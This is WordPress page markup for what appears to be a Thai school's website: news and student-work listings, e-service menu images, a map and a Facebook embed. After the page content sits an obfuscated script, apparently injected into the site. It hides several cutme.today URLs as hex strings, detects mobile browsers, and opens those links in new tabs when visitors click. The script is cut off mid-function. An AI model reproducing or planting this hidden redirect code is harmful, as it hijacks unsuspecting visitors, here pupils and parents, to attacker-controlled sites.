{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 